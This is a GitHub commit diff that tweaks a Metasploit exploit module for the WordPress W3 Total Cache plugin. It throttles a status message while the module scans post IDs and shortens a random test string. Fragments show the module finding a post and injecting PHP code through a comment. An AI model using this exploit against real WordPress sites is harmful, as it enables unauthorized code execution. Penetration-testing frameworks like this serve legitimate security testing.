We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 52b721c commit 9b5e96bCopy full SHA for 9b5e96b
modules/exploits/unix/webapp/php_wordpress_total_cache.rb
@@ -128,7 +128,7 @@ def check_post_id(uri)
128
129
def find_post_id
130
(1..1000).each{|id|
131
- vprint_status("#{peer} - Checking POST ID #{id}...")
+ vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0
132
res = check_post_id(normalize_uri(target_uri) + "/?p=#{id}")
133
return id if res
134
}
@@ -195,7 +195,7 @@ def exploit
195
end
196
197
198
- random_test = rand_text_alpha(4096)
+ random_test = rand_text_alpha(64)
199
@sum = Rex::Text.sha1(random_test)
200
201
print_status("#{peer} - Injecting the PHP Code throw a comment...")
0 commit comments